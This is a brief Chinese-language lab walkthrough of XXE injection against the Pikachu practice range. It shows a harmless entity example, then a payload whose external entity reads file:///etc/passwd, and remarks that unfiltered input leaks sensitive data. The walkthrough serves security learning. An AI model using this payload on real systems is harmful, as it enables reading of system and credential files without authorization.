原理:
演示:
打开pikachu,找到xxe,先看一下后台代码怎么写的,
咱们先通过一个正常的例子来测一下
<?xml version = "1.0"?>
<!DOCTYPE note [
<!ENTITY hacker "ESHLkangi">
]>
<name>&hacker;</name>
输入显示的结果是
反例:
<?xml version = "1.0"?>
<!DOCTYPE ANY [
<!ENTITY f SYSTEM "file:///etc/passwd">
]>
<x>&f;</x>
结果为:
敏感数据露出来了。。。。没有对传过来的数据进行过滤。。。